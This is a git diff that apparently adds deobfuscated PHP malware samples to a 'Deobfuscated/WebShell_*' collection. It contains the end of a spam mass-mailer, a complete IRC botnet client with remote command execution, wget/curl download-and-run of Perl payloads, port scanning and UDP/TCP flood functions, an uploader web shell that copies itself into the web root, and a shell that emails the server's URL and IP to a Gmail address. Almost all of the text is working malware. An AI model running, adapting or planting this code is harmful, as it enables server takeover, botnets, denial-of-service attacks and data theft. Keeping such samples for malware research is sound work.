+                @copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
+
+                $content = fread(fopen($file,"r"),filesize($file));
+
+                $content = chunk_split(base64_encode($content));
+
+                $uid = strtoupper(md5(uniqid(time())));
+
+                $name = basename($file);
+
+        }
+
+        
+
+        for($x=0; $x<$numemails; $x++){
+
+                if($_POST['emailz'] && $_POST['wait'])
+                        if( fmod($x,$emailz) == 0 ) {
+                                echo "-------------------------------> SUNT LA emailul $x, astept $wait secunde.<br>";
+                                sleep($wait);
+                        }
+                $to = $allemails[$x];
+
+                if ($to){
+
+					$to = ereg_replace(" ", "", $to);
+					$to = trim($to);
+	
+					$message = ereg_replace("&email&", $to, $message);
+	
+					$subject = ereg_replace("&email&", $to, $subject);
+	
+					print "Sending mail to $to.......";
+	
+					flush();
+					ob_flush();
+	
+					$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
+	
+					$header .= "MIME-Version: 1.0\r\n";
+	
+					if ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
+	
+					if ($file_name) $header .= "--$uid\r\n";
+	
+					$header .= "Content-Type: text/$contenttype\r\n";
+	
+					$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
+	
+					$header .= "$message\r\n";
+	
+					if ($file_name) $header .= "--$uid\r\n";
+	
+					if ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
+	
+					if ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
+	
+					if ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
+	
+					if ($file_name) $header .= "$content\r\n";
+	
+					if ($file_name) $header .= "--$uid--";
+	
+					@mail($to, $subject, "", $header);
+	
+					print " S-o dus<br>";
+	
+					flush();
+					ob_flush();
+
+                }
+
+		}//end for
+		
+		if( strpos($_POST['emailfinal'], "@") !== false){
+			@mail($_POST['emailfinal'], $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], "test");
+		}
+                //$emaillist .= "\n". $_POST['emailfinal'];
+
+
+
+}
+
+
+?>
diff --git a/Deobfuscated/WebShell_0d7c88a18a0cba44f1f808de084fed1273d4911e.php b/Deobfuscated/WebShell_0d7c88a18a0cba44f1f808de084fed1273d4911e.php
new file mode 100644
index 0000000..27ca389
--- /dev/null
+++ b/Deobfuscated/WebShell_0d7c88a18a0cba44f1f808de084fed1273d4911e.php
@@ -0,0 +1,854 @@
+<?php
+  set_time_limit( 0 );
+  error_reporting( 0 );
+  echo "Success!";
+
+  class pBot
+  {
+    var $using_encode = true;
+
+    var $config = array(
+      'server'   => 'NzguMTQwLjE3My40Mw==',  //server here (base64)
+      'port'    => 9595,
+      'chan'    => 'MXgzM3g3',    //channel here (base64) DO NOT USE "#", "#lazy" = "lazy"
+      'key'    => '',
+      'nickform'  => 'logging[%d]',
+      'identp'  => 'darxs',
+      'modes'    => '+p',
+      'maxrand'  => 6,
+      'cprefix'  => '!',
+      'host'    => 'Peter@'
+    );
+
+    var $admins = array
+    (
+      'LND-Bloodman' => '2cbd62e679d89acf7f1bfc14be08b045' // pass = "lol_dont_try_cracking_12char+_:P"
+      //passes are MD5 format, you can also have multiple admins
+    );
+
+    function auth_host( $nick, $password, $host )
+    {
+      $admin_count = count( $this->admins );
+      if( $admin_count > 0 )
+      {
+        $mpass = md5( $password );
+        if( $this->admins[ $nick ] == $mpass )
+        {
+          $this->users[ $host ] = true;
+        }
+      }
+      else
+      {
+        $this->users[ $host ] = true;
+      }
+    }
+
+    function is_authed( $host )
+    {
+      return isset( $this->users[ $host ] );
+    }
+
+    function remove_auth( $host )
+    {
+      unset( $this->users[ $host ] );
+    }
+
+    function ex( $cfe )
+    {
+      $res = '';
+      if (!empty($cfe))
+      {
+        if(function_exists('class_exists') && class_exists('Perl'))
+        {
+          $perl = new Perl();
+          $perl->eval( "system('$cfe');" );
+        }
+        if(function_exists('exec'))
+        {
+          @exec($cfe,$res);
+          $res = join("\n",$res);
+        }
+        elseif(function_exists('shell_exec'))
+        {
+          $res = @shell_exec($cfe);
+        }
+        elseif(function_exists('system'))
+        {
+          @ob_start();
+          @system($cfe);
+          $res = @ob_get_contents();
+          @ob_end_clean();
+        }
+        elseif(function_exists('passthru'))
+        {
+          @ob_start();
+          @passthru($cfe);
+          $res = @ob_get_contents();
+          @ob_end_clean();
+        }
+        elseif(function_exists('proc_open'))
+        {
+          $res = proc_open($cfe);
+        }
+        elseif(@is_resource($f = @popen($cfe,"r")))
+        {
+          $res = "";
+          while(!@feof($f)) { $res .= @fread($f,1024); }
+          @pclose($f);
+        }
+      }
+      return $res;
+    }
+
+    function is_safe( )
+    {
+      if( ( @eregi( "uid", $this->ex( "id" ) ) ) || ( @eregi( "Windows", $this->ex( "net start" ) ) ) )
+      {
+        return 0;
+      }
+      return 1;
+    }
+
+    function get_chan( )
+    {
+      if( $this->using_encode )
+      {
+        return '#'.base64_decode( $this->config[ 'chan' ] );
+      }
+      else
+      {
+        return '#'.$this->config[ 'chan' ];
+      }
+    }
+
+    function start()
+    {
+      if( $this->using_encode )
+      {
+        if(!($this->conn = fsockopen(base64_decode($this->config['server']),$this->config['port'],$e,$s,30)))
+        {
+          $this->start();
+        }
+      }
+      else
+      {
+        if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
+        {
+          $this->start();
+        }
+      }
+
+      $ident = $this->config['prefix'];
+      $alph = range("0","9");
+      for( $i=0; $i < $this->config['maxrand']; $i++ )
+      {
+        $ident .= $alph[rand(0,9)];
+      }
+
+      if( strlen( $this->config[ 'pass' ] ) > 0 )
+      {
+        $this->send( "PASS ".$this->config[ 'pass' ] );
+      }
+
+      $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
+      $this->set_nick( );
+      $this->main( );
+    }
+
+    function main()
+    {
+      while(!feof($this->conn))
+      {
+        $this->buf = trim(fgets($this->conn,512));
+        $cmd = explode(" ",$this->buf);
+        if(substr($this->buf,0,6)=="PING :")
+        {
+          $this->send("PONG :".substr($this->buf,6));
+        }
+        if(isset($cmd[1]) && $cmd[1] =="001")
+        {
+          $this->send("MODE ".$this->nick." ".$this->config['modes']);
+
+          if( $this->using_encode )
+          {
+            $this->join($this->get_chan( ),base64_decode($this->config['key']));
+          }
+          else
+          {
+            $this->join($this->get_chan( ),$this->config['key']);
+          }
+
+          if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
+          else { $safemode = "off"; }
+          $uname = php_uname();
+        }
+        if(isset($cmd[1]) && $cmd[1]=="433")
+        {
+          $this->set_nick();
+        }
+        if($this->buf != $old_buf)
+        {
+          $mcmd = array();
+          $msg = substr(strstr($this->buf," :"),2);
+          $msgcmd = explode(" ",$msg);
+          $nick = explode("!",$cmd[0]);
+          $vhost = explode("@",$nick[1]);
+          $vhost = $vhost[1];
+          $nick = substr($nick[0],1);
+          $host = $cmd[0];
+          if($msgcmd[0]==$this->nick)
+          {
+            for($i=0;$i<count($msgcmd);$i++)
+              $mcmd[$i] = $msgcmd[$i+1];
+          }
+          else
+          {
+            for($i=0;$i<count($msgcmd);$i++)
+              $mcmd[$i] = $msgcmd[$i];
+          }
+          if(count($cmd)>2)
+          {
+            switch($cmd[1])
+            {
+              case "QUIT":
+              {
+                if( $this->is_authed( $host ) )
+                {
+                  $this->remove_auth( $host );
+                }
+              }
+              break;
+              case "PART":
+              {
+                if( $this->is_authed( $host ) )
+                {
+                  $this->remove_auth( $host );
+                }
+              }
+              break;
+              case "PRIVMSG":
+                if( ( substr($mcmd[0],0,1) == $this->config[ 'cprefix' ] ) )
+                {
+                  if( $this->is_authed( $host ) == false )
+                  {
+                    switch( substr( $mcmd[ 0 ], 1 ) )
+                    {
+                      case "auth":
+                      {
+                        $this->auth_host( $nick, $mcmd[ 1 ], $host );
+                        if( $this->is_authed( $host ) )
+                        {
+                          $this->privmsg( $this->get_chan( ), "[ auth ] Successful login from [ ".$nick." ]" );
+                        }
+                        else
+                        {
+                          $this->privmsg( $this->get_chan( ), "[ auth ] Failed attempt from [ ".$nick." ]" );
+                        }
+                        break;
+                      }
+                    }
+                  }
+                  else
+                  {
+                    switch(substr($mcmd[0],1))
+                    {
+                      case "exec":
+                      {
+                        if( !$this->is_safe( ) )
+                        {
+                          $command = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 );
+                          $returndata = $this->ex( $command );
+                          if( !empty( $returndata ) )
+                          {
+                            $this->privmsg( $this->get_chan( ), '[ exec ] '.$returndata );
+                          }
+                        }
+                        break;
+                      }
+                      case "info":
+                      {
+                        $safemode = "on";
+                        if( !$this->is_safe( ) )
+                        {
+                          $safemode = "off";
+                        }
+                        $this->privmsg( $this->get_chan( ), '[ info ] '.php_uname( ).' ( SAFE: '.$safemode.' )' );
+                        break;
+                      }
+                      case "safe":
+                      {
+                        $safemode = "on";
+                        if( !$this->is_safe( ) )
+                        {
+                          $safemode = "off";
+                        }
+                        $this->privmsg( $this->get_chan( ), '[ safe ] '.$safemode );
+                        break;
+                      }
+                      case "uname":
+                      {
+                        $this->privmsg( $this->get_chan( ), '[ uname ] '.php_uname( ) );
+                        break;
+                      }
+                      case "perl":
+                      {
+                        if( $this->is_safe( ) )
+                        {
+                          $this->privmsg( $this->get_chan( ), '[ dropperl ] Safe mode is ON' );
+                          break;
+                        }
+
+                        $perl_file = $mcmd[1];
+
+                        if( !empty( $perl_file ) )
+                        {
+                          $parsed_url = $this->parse_url_s( $perl_file );
+
+                          $new_remote = $parsed_url[ 'scheme' ].'://'.$parsed_url[ 'host' ].$parsed_url[ 'dir' ].'/';
+                          $new_local   = $parsed_url[ 'file' ];
+                          $file_type  = $parsed_url[ 'file_ext' ];
+
+                          $this->ex('cd /tmp;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
+                          $this->ex('cd /tmp;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
+                          $this->ex('cd /tmp;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
+                          $this->ex('cd /tmp;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
+                          $this->ex('cd /dev/shm;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
+                          $this->ex('cd /dev/shm;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
+                          $this->ex('cd /dev/shm;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*')
+                          $this->ex('cd /dev/shm;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*')
+                          $this->ex('cd /tmp;rm -rf *'.$file_type.'**');
+                          $this->ex('cd /dev/shm;rm -rf *'.$file_type.'**');
+
+                          $this->privmsg( $this->get_chan( ), '[ execrfi ] Executed file '.$new_remote.$new_local );
+                          break;
+                        }
+
+                        $this->privmsg( $this->get_chan( ), '[ execrfi ] Failure executing '.$perl_file );
+                        break;
+                      }
+                      case "ip":
+                      {
+                        $this->privmsg( $this->get_chan( ), '[ ip ] '.$_SERVER['SERVER_ADDR'] );
+                        break;
+                      }
+                      case "rfi":
+                      {
+                        $fileUrl = $mcmd[1];
+
+                        if( !empty( $fileUrl ) )
+                        {
+                          $urli = parse_url( $fileUrl );
+
+                          if( !empty( $urli['host'] ) && !empty( $urli['path'] ) && !empty( $urli['query'] ) )
+                          {
+                            $fp = fsockopen( $urli['host'], 80, $errno, $errstr, 5 );
+
+                            if( $fp )
+                            {
+                              $out = "GET /".$urli['path'].$urli['query']." HTTP/1.1\r\n";
+                              $out .= "Host: ".$urli['host']."\r\n";
+                              $out .= "Keep-Alive: 300\r\n";
+                              $out .= "Connection: keep-alive\r\n\r\n";
+                              fwrite( $fp, $out );
+
+                              $get_data = '';
+
+                              while(!feof($fp))
+                              { $get_data .= fgets( $fp, 256 ); }
+
+                              $this->privmsg( $this->get_chan( ), '[ execrfi ] Executed file '.$fileUrl );
+                              break;
+                            }
+                          }
+                        }
+
+                        $this->privmsg( $this->get_chan( ), '[ execrfi ] Failure executing '.$fileUrl );
+                        break;
+                      }
+                      case "base64":
+                      {
+                        $str_ed = substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 );
+                        switch( $mcmd[1] )
+                        {
+                          case "encode":
+                          {
+                            $this->privmsg( $this->get_chan( ), "[ base64 ] encode [ '".$str_ed."' -> '".base64_encode($str_ed).
+                            break;
+                          }
+                          case "decode":
+                          {
+                            $this->privmsg( $this->get_chan( ), "[ base64 ] decode [ '".$str_ed."' -> '".base64_decode($str_ed).
+                            break;
+                          }
+                        }
+                        break;
+                      }
+                      case "md5":
+                      {
+                        $str_md5 = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 );
+                        $this->privmsg( $this->get_chan( ), "[ md5 ] [ '".$str_md5."' -> '".md5($str_md5)."' ]" );
+                        break;
+                      }
+                      case "dns":
+                      {
+                        if(isset($mcmd[1]))
+                                         {
+                                            $ip = explode(".",$mcmd[1]);
+                                            if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1])
+                            && is_numeric($ip[2]) && is_numeric($ip[3]))
+                                            {
+                                               $this->privmsg($this->get_chan( ),"[ dns ]: ".$mcmd[1]." => ".gethostbyaddr($mcmd
+                                            }
+                                            else
+                                            {
+                                               $this->privmsg($this->get_chan( ),"[ dns ]: ".$mcmd[1]." => ".gethostbyname($mcmd
+                                            }
+                                         }
+                        break;
+                      }
+                      case "exit":
+                      {
+                        fclose( $this->conn );
+                        exit( );
+                        break;
+                      }
+                      case "restart":
+                      {
+                        $this->privmsg( $this->get_chan( ), "[ restart ] executed by [".$nick."]" );
+                        $this->send( "QUIT :restart command from ".$nick );
+                        fclose( $this->conn );
+                        $this->start();
+                        break;
+                      }
+                      case "bs":
+                      {
+                        if( $this->is_safe( ) )
+                        {
+                          ini_restore( "safe_mode" );
+                          ini_restore( "open_basedir" );
+                        }
+
+                        $safemode = "on";
+                        if( !$this->is_safe( ) )
+                        {
+                          $safemode = "off";
+                          $this->set_nick();
+                        }
+                        $this->privmsg( $this->get_chan( ), '[ safe ] '.$safemode );
+                      }
+                      case "moveserver":
+                      {
+                        if( count( $mcmd ) > 3 )
+                        {
+                          $server = $mcmd[1];
+                          $port = $mcmd[2];
+                          $channel = $mcmd[3];
+                          $key = $mcmd[4];
+
+                          if( $this->using_encode )
+                          {
+                            $this->config[ 'server' ] = base64_encode( $server );
+                            $this->config[ 'chan' ] = base64_encode( str_replace( "#", "", $channel ) );
+                            $this->config[ 'key' ] = base64_encode( $key );
+                          }
+                          else
+                          {
+                            $this->config[ 'server' ] = $server;
+                            $this->config[ 'chan' ] = str_replace( "#", "", $channel );
+                            $this->config[ 'key' ] = $key;
+                          }
+
+                          $this->config[ 'port' ] = $port;
+                          $this->privmsg( $this->get_chan( ), "[ moveserver ] ".$server." => ".$port." => ".$channel." =>
+                          $this->send( "QUIT :moveserver command from ".$nick );
+
+                          fclose( $this->conn );
+                          $this->start();
+                        }
+                        break;
+                      }
+                      case "whois":
+                      {
+                        $param2 = $mcmd[1];
+
+                        if( !empty( $param2 ) )
+                        {
+                          //do it
+                          //http://ws.arin.net/whois/?queryinput=127.0.0.1
+                          $fp = fsockopen( "ws.arin.net", 80, $errno, $errstr, 30 );
+
+                          if( $fp )
+                          {
+                            $out = "GET /whois/?queryinput=$param2 HTTP/1.1\r\n";
+                            $out .= "Host: ws.arin.net\r\n";
+                            $out .= "Keep-Alive: 300\r\n";
+                            $out .= "Connection: keep-alive\r\n\r\n";
+                            fwrite( $fp, $out );
+
+                            $whodata = '';
+                            while(!feof($fp))
+                            {
+                              /*do nothing*/
+                              $whodata .= fread( $fp, 1024 );
+                            }
+
+                            $explk = explode( "<div id=\"content\">", $whodata );
+                            $explk = explode( "</div>", $explk[1] );
+                            $htmldat = strip_tags( $explk[0] );
+
+                            fclose( $fp );
+
+                            $this->privmsg( $this->get_chan( ), "[ whois ] $htmldat" );
+
+                          }else{
+                            $this->privmsg( $this->get_chan( ), "[ whois ] Error: $errstr" );
+                          }
+                        }
+                        else
+                        {
+                          $this->privmsg( $this->get_chan( ), "[ whois ] Invalid params, use .whois <ip/host>" );
+                        }
+                        break;
+                      }
+                      case "upftp":
+                      {
+                        //ftp://user:password@host.com
+                        $pftp = parse_url( $mcmd[1] );
+                        $file = $mcmd[2];
+                        $dest = $mcmd[3];
+
+                        if( empty( $pftp[ 'host' ] )
+                          || empty( $pftp[ 'user' ] )
+                          || empty( $pftp[ 'pass' ] )
+                          || empty( $file )
+                          || empty( $dest ) )
+                        {
+                          $this->privmsg( $this->get_chan( ), "[ upftp ] URL line invalid!" );
+                        }
+                        else
+                        {
+                          $conn_id = ftp_connect( $pftp[ 'host' ] );
+                          $login_result = ftp_login( $conn_id, $pftp[ 'user' ], $pftp[ 'pass' ] );
+
+                          if( ( !$conn_id ) || ( !$login_result ) )
+                          {
+                            $this->privmsg( $this->get_chan( ), "[ upftp ] FTP connection failed!" );
+                          }
+                          else
+                          {
+                            $this->privmsg( $this->get_chan( ), "[ upftp ] Connected to ".$pftp[ 'host' ]." for user ".$pftp[ 'user
+                            $upload = ftp_put( $conn_id, $dest, $file, FTP_BINARY );
+                            if( !$upload )
+                            {
+                              $this->privmsg( $this->get_chan( ), "[ upftp ] FTP upload faled!" );
+                            }
+                            else
+                            {
+                              $this->privmsg( $this->get_chan( ), "[ upftp ] FTP upload success!" );
+                              $this->privmsg( $this->get_chan( ), "[ upftp ] Uploaded '".$file."' to '".$dest."'" );
+                            }
+                          }
+                        }
+                        break;
+                      }
+                      case "joinchan":
+                      {
+                        $channel = $mcmd[1];
+                        $key = $mcmd[2];
+                        $this->privmsg( $this->get_chan( ), "[ joinchan ] ".$channel." => ".$key );
+                        $this->join( $channel, $key );
+                        break;
+                      }
+                      case "partchan":
+                      {
+                        $this->privmsg( $this->get_chan( ), "[ partchan ] ".$mcmd[1] );
+                        $this->send( "PART ".$mcmd[1] );
+                      }
+                      case "vuln":
+                      {
+                        $server_name = $_SERVER['SERVER_NAME'];
+                        $req_uri = $_SERVER['REQUEST_URI'];
+
+                        if( $server_name != "localhost" && $server_name != "127.0.0.1" )
+                        {
+                          if( strlen( $server_name ) && strlen( $req_uri ) )
+                          {
+                            $vuln = "http://".$server_name.$req_uri;
+                            $this->privmsg( $this->get_chan( ), "[ getvuln ] ".$vuln );
+                          }
+                        }
+                        break;
+                      }
+                      case "download":
+                      {
+                        if( count( $mcmd ) > 2 )
+                        {
+                          if( !$fp = fopen( $mcmd[ 2 ], "w" ) )
+                          {
+                            $this->privmsg( $this->get_chan( ), "[ download ] Permission denied!" );
+                          }
+                          else
+                          {
+                            if( !$get = file( $mcmd[ 1 ] ) )
+                            {
+                              $this->privmsg( $this->get_chan( ), "[ download ] Download failed!" );
+                            }
+                            else
+                            {
+                              for( $i=0; $i <= count( $get ); $i++ )
+                              {
+                                fwrite( $fp, $get[ $i ] );
+                              }
+                              $this->privmsg( $this->get_chan( ),"[ download ] URL [".$mcmd[ 1 ]."] to [".$mcmd[ 2 ]."]");
+                            }
+                            fclose( $fp );
+                          }
+                        }
+                        else
+                        {
+                          $this->privmsg( $this->get_chan( ), "[ download ] Invalid Parameters, idiot!" );
+                        }
+                        break;
+                      }
+                      case "pmsg":
+                      {
+                        $person = $mcmd[1];
+                        $text = substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 );
+                        $this->privmsg( $this->get_chan( ), "[ pmsg ] ".$person." => ".$text );
+                        $this->privmsg( $person, $text );
+                        break;
+                      }
+                      case "pscan":
+                      {
+                        $host = $mcmd[1];
+                        $beginport = $mcmd[2];
+                        $endport = $mcmd[3];
+                        $open_ports = "Open Port List for ".$host.": ";
+
+                        for($i = $beginport; $i < $endport; $i++)
+                        {
+                          if( $this->scanport( $host, $i ) )
+                          {
+                            $open_ports .= "|".$i;
+                          }
+                        }
+
+                        $this->privmsg( $this->get_chan( ), $open_ports );
+                        break;
+                      }
+                      case "software":
+                      {
+                        $this->privmsg( $this->get_chan( ), $_SERVER[ 'SERVER_SOFTWARE' ] );
+                        break;
+                      }
+                      case "snf":
+                      {
+                        $this->config[ 'nickform' ] = $mcmd[ 1 ];
+                        $this->privmsg( $this->get_chan( ), "Nickname format set to [ ".$mcmd[ 1 ]." ]" );
+                        break;
+                      }
+                      case "randnick":
+                      {
+                        $this->set_nick();
+                        break;
+                      }
+                      case "unauth":
+                      {
+                        $this->remove_auth( $host );
+                        $this->privmsg( $this->get_chan( ), "[ auth ] Logout [ ".$nick." ]" );
+                        break;
+                      }
+                      case "urlbomb":
+                      {
+                        $this->urlbomb( $mcmd[ 1 ], $mcmd[ 2 ], $mcmd[ 3 ] );
+                        break;
+                      }
+                      case "udpflood":
+                      {
+                        if( count( $mcmd ) > 3 )
+                        {
+                          $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
+                        }
+                        break;
+                      }
+                      case "tcpflood":
+                      {
+                         if( count( $mcmd ) > 5 )
+                         {
+                           $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
+                         }
+                         break;
+                      }
+                    }
+                  }
+                }
+              break;
+            }
+          }
+        }
+        $old_buf = $this->buf;
+      }
+      $this->start();
+    }
+
+    function scanport( $host, $port )
+    {
+      if( fsockopen( $host, $port, $e, $s ) )
+      {
+        return 1;
+      }
+      return 0;
+    }
+
+    function urlbomb( $host, $path, $times, $mode = 0 )
+    {
+      if( !isset( $host ) || !isset( $path ) || !isset( $times ) )
+        return;
+
+      $this->privmsg( $this->get_chan( ), '[ urlbomb ] started! [ '.$host.'/'.$path.' ]' );
+
+      $success = 0;
+      for( $i = 0; $i < $times; $i++ )
+      {
+        $fp = fsockopen( $host, 80, $errno, $errstr, 30 );
+        if( $fp )
+        {
+          $out = "GET /".$path." HTTP/1.1\r\n";
+          $out .= "Host: ".$host."\r\n";
+          $out .= "Keep-Alive: 300\r\n";
+          $out .= "Connection: keep-alive\r\n\r\n";
+          fwrite( $fp, $out );
+
+          if( $mode != 0 )
+          {
+            while(!feof($fp)){/*do nothing*/}
+          }
+
+          fclose( $fp );
+
+          $success++;
+        }
+      }
+
+      $this->privmsg( $this->get_chan( ), '[ urlbomb ] finished! [ '.$host.'/'.$path.' ][ success: '.$success.' ]' );
+    }
+
+    function udpflood( $host, $packetsize, $time )
+    {
+      $this->privmsg( $this->get_chan( ),"[ udpflood ] Started [".$host."]" );
+      $packet = "";
+      for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
+      $timei = time();
+      $i = 0;
+      while(time()-$timei < $time)
+      {
+        $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
+        fwrite($fp,$packet);
+        fclose($fp);
+        $i++;
+      }
+      $env = $i * $packetsize;
+      $env = $env / 1048576;
+      $vel = $env / $time;
+      $vel = round($vel);
+      $env = round($env);
+      $this->privmsg( $this->get_chan( ),"[ udpflood ] $env MB Sent / $vel MB/s ");
+    }
+
+    function tcpflood($host,$packets,$packetsize,$port,$delay)
+    {
+      $this->privmsg( $this->get_chan( ),"[\2TcpFlood Started!\2]");
+      $packet = "";
+      for($i=0;$i<$packetsize;$i++)
+        $packet .= chr(mt_rand(1,256));
+
+      for($i=0;$i<$packets;$i++)
+      {
+        if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
+          {
+          $this->privmsg( $this->get_chan( ),"[\2TcpFlood\2]: Error: <$e>");
+            return 0;
+           }
+           else
+           {
+          fwrite($fp,$packet);
+          fclose($fp);
+        }
+           sleep($delay);
+      }
+      $this->privmsg( $this->get_chan( ),"[\2TcpFlood Finished!\2]: Config - $packets for $host:$port.");
+    }
+
+    function send($msg)
+    {
+      fwrite($this->conn,"$msg\r\n");
+    }
+
+    function join($chan,$key=NULL)
+    {
+      $this->send("JOIN $chan $key");
+    }
+
+    function privmsg($to,$msg)
+    {
+      $this->send("PRIVMSG $to :$msg");
+    }
+
+    function notice($to,$msg)
+    {
+      $this->send("NOTICE $to :$msg");
+    }
+
+     function set_nick()
+     {
+      $prefix = "[lnx]";
+      if(isset($_SERVER['SERVER_SOFTWARE']))
+      {
+        if( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ), "apache" ) )
+          $prefix = "[A]";
+        elseif( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ), "iis" ) )
+          $prefix = "[I]";
+        elseif( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ), "xitami" ) )
+          $prefix = "[X]";
+        else
+          $prefix = "[U]";
+      }
+
+      if( !$this->is_safe( ) )
+      {
+        $prefix .= "[win32]";
+      }
+
+      $random_number = "";
+      for( $i = 0; $i < $this->config[ 'maxrand' ]; $i++ )
+      {
+        $random_number .= mt_rand( 0, 9 );
+      }
+
+      $this->nick = sprintf( $prefix.$this->config[ 'nickform' ], $random_number );
+      $this->send("NICK ".$this->nick);
+     }
+
+    function parse_url_s( $url )
+    {
+      $URLpcs = ( parse_url( $url ) );
+      $PathPcs = explode( "/", $URLpcs['path'] );
+      $URLpcs['file'] = end( $PathPcs );
+      unset( $PathPcs[ key( $PathPcs ) ] );
+      $URLpcs['dir'] = implode("/",$PathPcs);
+
+      $fileext = explode( '.', $URLpcs['file'] );
+
+      if(count($fileext))
+      {
+        $URLpcs['file_ext'] = $fileext[ count( $fileext ) - 1 ];
+      }
+
+      return ($URLpcs);
+    }
+  }
+
+  $bot = new pBot;
+  $bot->start();
+
+?>
\ No newline at end of file
diff --git a/Deobfuscated/WebShell_5baf031af52d9d0b7c14b0a737a371e8fbfd62e5.php b/Deobfuscated/WebShell_5baf031af52d9d0b7c14b0a737a371e8fbfd62e5.php
new file mode 100644
index 0000000..af757c1
--- /dev/null
+++ b/Deobfuscated/WebShell_5baf031af52d9d0b7c14b0a737a371e8fbfd62e5.php
@@ -0,0 +1,27 @@
+<?php
+echo "<title>RevSlideR 2015</title><br><br>";
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "4,1ON(BuSuX)";
+}
+else {$safemode = false; $hsafemode = "OFF(WoKeH)";}
+$os = wordwrap(php_uname(),90,"<br>",1);
+$xos = "Safe-mode:[Safe-mode:".$hsafemode."] 7 [OS:".$os."]";
+echo "<center> ".$xos." </center><br>";
+
+if(isset($_GET['x'])){
+echo "<title>PiNDaH 2015</title><br><br>";
+$source = $_SERVER['SCRIPT_FILENAME'];
+$desti =$_SERVER['DOCUMENT_ROOT']."/default.php";
+copy($source, $desti);
+}
+
+echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
+echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
+if( $_POST['_upl'] == "Upload" ) {
+        if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
+        else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
+}
+?>
\ No newline at end of file
diff --git a/Deobfuscated/WebShell_71826e9fb350611ac274038abea50c230549f94d.php b/Deobfuscated/WebShell_71826e9fb350611ac274038abea50c230549f94d.php
new file mode 100644
index 0000000..5986cf6
--- /dev/null
+++ b/Deobfuscated/WebShell_71826e9fb350611ac274038abea50c230549f94d.php
@@ -0,0 +1,74 @@
+<?php
+if (!isset($_SESSION['bajak'])) {
+$visitcount = 0;
+$web = $_SERVER["HTTP_HOST"];
+$inj = $_SERVER["REQUEST_URI"];
+$body = "Target ditemukan \n$web$inj";
+$safem0de = @ini_get('safe_mode');
+if (!$safem0de) {$security= "SAFE_MODE = OFF";}
+else {$security= "SAFE_MODE = ON";};
+$serper=gethostbyname($_SERVER['SERVER_ADDR']);
+$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
+mail("jalangsaya@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");
+mail("jalangsaya@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");
+$_SESSION['bajak'] = 1;
+}
+else {$_SESSION['bajak']++;};
+if(isset($_GET['clone'])){
+$source = $_SERVER['SCRIPT_FILENAME'];
+$desti =$_SERVER['DOCUMENT_ROOT']."/.libs.php";
+rename($source, $desti);
+}
+$safem0de = @ini_get('safe_mode');
+if (!$safem0de) {$security= "SAFE_MODE : OFF jalanG";}
+else {$security= "SAFE_MODE : ON jalanG";}
+echo "<title>jalanG</title><br>";
+$dataku = "POWERED BY jalanG";
+$dataku2 = "ready fresh tools SHELLS FTP CPANEL RDP MAILER";
+$dataku3 = "Contact Admin YM :ready.buyer";
+echo "<font size=2 color=blue><b>".$dataku."</b><br>";
+echo "<font size=2 color=red><b>".$dataku2."</b><br>";
+echo "<font size=2 color=blue><b>".$dataku3."</b><br>";
+echo "<font size=2 color=#888888><b>".$security."</b><br>";
+$cur_user="(".get_current_user().")";
+echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
+echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
+function pwd() {
+$cwd = getcwd();
+if($u=strrpos($cwd,'/')){
+if($u!=strlen($cwd)-1){
+return $cwd.'/';}
+else{return $cwd;};
+}
+elseif($u=strrpos($cwd,'\\')){
+if($u!=strlen($cwd)-1){
+return $cwd.'\\';}
+else{return $cwd;};
+};
+}
